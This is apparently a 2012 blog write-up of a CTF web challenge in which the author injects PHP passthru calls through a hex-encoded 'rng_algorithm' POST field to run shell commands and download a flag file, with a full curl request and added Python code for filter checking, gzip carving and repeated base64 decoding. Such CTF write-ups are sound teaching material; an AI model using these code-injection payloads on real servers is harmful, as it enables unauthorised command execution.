Wednesday, October 17, 2012

hackyou CTF: Web 300

I'm very confident that I did not solve this the way it was meant to be solved. Because of that, I believe I made it more complicated than necessary, but in the end I think it was a very cool solution.

The website is a random number generator, and from the challenge we know two things: they give you some nasty, nasty obfuscated PHP source code for the site, and we want to read flag.txt.gz but can't.
I had NO clue how to decode this source code or even how it runs on the server (please comment if you know how). What I did see, however, was a POST parameter called rng_algorithm whose value was a long string of hex digits. Decoded to ASCII, it read "ShA1(dATe(CRyPT(CRC32(sTRReV(ABs($1%SqrT(eXP(EXp(pI())))))))))". WE CAN CHANGE THE ALGORITHM!!! HOORAY!

Wuut? Hacker detected!

The website returned this at one point, so we can at least influence the algorithm. But what can we change it to? After much manual fuzzing I determined three constraints: the algorithm must begin with "ShA1(dATe(" (camelcase matters), it must have the same length as the original, and it may only contain characters whose hex encoding consists of decimal digits (0x0a would not work but 0x09 would). This unfortunately eliminates so many useful characters that I spent the next few hours trying to craft an algorithm that would actually work and get me somewhere. Eventually I was able to run the following algorithm.
ShA1(dATe($0))&(@passthru('pwd')%'11111111111111111111111111')
This returned my current working directory! We are getting somewhere! After about another 30 minutes of trying to figure out how to read the file, I ran the following algorithm.
ShA1(dATe($0))&(@passthru('cat `dir`')%'11111111111111111111')
This was a bad way to try to get a gz file, though (copy and paste is unreliable at best), so I decided to send the request through curl and write the output to a file.
curl --data "rng_seeds=280527088%0D%0A1067734584%0D%0A2024574801%0D%0A11326050%0D%0A1199766137%0D%0A&rng_algorithm=5368413128644154652824302929262840706173737468727528276361742060646972602729252731313131313131313131313131313131313131312729" http://securerng.misteryou.ru/ > flag.txt.gz
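To make the three constraints concrete, here is an added Python check (my own code, not part of the original write-up or of the challenge) that decodes the rng_algorithm value from the curl command above and tests a candidate string against the prefix, length and digits-only-hex rules. Run over the strings on this page, it shows why the original camelcased algorithm passes, why the odd-looking `dir` and `passthru` survive the filter while `ls` does not, and therefore why a filter that only constrains character encodings is no defence against command execution.

```python
import binascii

# Constraints the write-up reports from manual fuzzing of rng_algorithm:
#   1. it must start with "ShA1(dATe(" (case-sensitive),
#   2. it must keep the length of the original algorithm string,
#   3. the hex encoding of every character may contain only decimal digits.
REQUIRED_PREFIX = "ShA1(dATe("
# Ten closing parens, one per nested call.
ORIGINAL_ALGORITHM = "ShA1(dATe(CRyPT(CRC32(sTRReV(ABs($1%SqrT(eXP(EXp(pI(" + ")" * 10
# rng_algorithm exactly as sent in the curl command above (hex-encoded ASCII).
RNG_ALGORITHM_HEX = (
    "53684131286441546528243029292628407061737374687275282763617420606469726027292527"
    "31313131313131313131313131313131313131312729"
)

def decode_rng_algorithm(hex_value):
    """Turn the hex-encoded POST parameter back into the algorithm string."""
    return binascii.unhexlify(hex_value).decode("ascii")

def hex_is_all_digits(text):
    """Constraint 3: the hex form of every byte uses only the characters 0-9."""
    return binascii.hexlify(text.encode("ascii")).decode().isdigit()

def rejected_chars(text):
    """Characters of text that violate constraint 3 ('l' is 0x6c; 'dir' is all digits)."""
    return [c for c in text if not hex_is_all_digits(c)]

def check_algorithm(candidate, reference=ORIGINAL_ALGORITHM):
    """List the violated constraints; an empty list means the filter accepts it."""
    problems = []
    if not candidate.startswith(REQUIRED_PREFIX):
        problems.append("prefix")
    if len(candidate) != len(reference):
        problems.append("length")
    bad = rejected_chars(candidate)
    if bad:
        problems.append("chars:" + "".join(sorted(set(bad))))
    return problems

if __name__ == "__main__":
    sent = decode_rng_algorithm(RNG_ALGORITHM_HEX)
    print(sent)
    print("original :", check_algorithm(ORIGINAL_ALGORITHM))  # []
    print("sent     :", check_algorithm(sent))
    print("ls       :", rejected_chars("ls"))                  # ['l']
    print("cat `dir`:", rejected_chars("cat `dir`"))           # []
```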
This did present some issues with there being extra data because of the other files in the directory, but it wasn't difficult to find the start and end of files with a little magic header research. I gunzipped the file only to find a ridiculously long base64 encoded string which, of course, was base64 encoded 42 times (I found that number with a variant of the below script). The script below decoded the flag and got the answer "flag: 36e03906042b7b266afa32bd1ea35445".
import base64

# Read the gunzipped response as bytes and strip the 42 base64 layers.
text = open('response.txt', 'rb').read()
for i in range(42):
    text = base64.b64decode(text)

print(text.decode())
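The gzip carving and the 42-layer unwrap described above, as an added Python example (my own code, not the script from the write-up): it finds the gzip member inside the raw curl output, lets zlib report where that member ends instead of trimming by hand, and then peels base64 layers until the result stops being valid base64, so the depth is discovered rather than hard-coded. The sample blob is constructed here; the only page value used is the flag text.

```python
import base64
import binascii
import gzip
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"  # ID1, ID2, CM=deflate

def carve_gzip(blob):
    """Decompress the first gzip member in blob, ignoring the other files' bytes."""
    start = blob.find(GZIP_MAGIC)
    if start < 0:
        raise ValueError("no gzip header in input")
    d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # 16+ selects gzip framing
    out = d.decompress(blob[start:])
    if not d.eof:  # trailer never seen: the member was cut off
        raise ValueError("gzip member is truncated")
    return out  # d.unused_data holds whatever followed the member

def peel_base64(data, max_layers=100):
    """Strip nested base64 layers until the result is no longer valid base64;
    returns (payload, layers_removed). validate=True makes b64decode reject the
    final plaintext (the flag has ':' and a space) rather than silently dropping
    those bytes, which is what stops the loop at the right depth."""
    current, layers = data.strip(), 0
    while layers < max_layers:
        try:
            decoded = base64.b64decode(current, validate=True)
        except binascii.Error:
            break
        if not decoded:
            break
        current, layers = decoded.strip(), layers + 1
    return current, layers

def wrap_base64(data, layers):
    """Constructed-input helper: base64-encode `layers` times."""
    for _ in range(layers):
        data = base64.b64encode(data)
    return data

def build_sample_blob(flag, layers=42):
    """Constructed stand-in for the raw curl output: other file contents, then
    the gzipped, 42-times-base64'd flag, then more output."""
    gz = gzip.compress(wrap_base64(flag, layers))
    return b"<html>index.php output</html>\n" + gz + b"\nmore files\n"

if __name__ == "__main__":
    blob = build_sample_blob(b"flag: 36e03906042b7b266afa32bd1ea35445")
    payload, layers = peel_base64(carve_gzip(blob))
    print(layers, payload.decode())  # 42 flag: 36e03906042b7b266afa32bd1ea35445
```

If the innermost payload itself happened to be valid base64, the loop would go one layer too far; checking the result for expected plaintext (here, the "flag: " prefix) catches that case.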
So. In summary, I made this much more difficult than I think it was supposed to be, but I think it was a cool solution regardless.

-- suntzu_II

1 comment:

  1. Hi, suntzu_II!
    http://h34dump.com/?p=346 - a write-up on the task, including code deobfuscation and a script that allows executing any command on the server side.
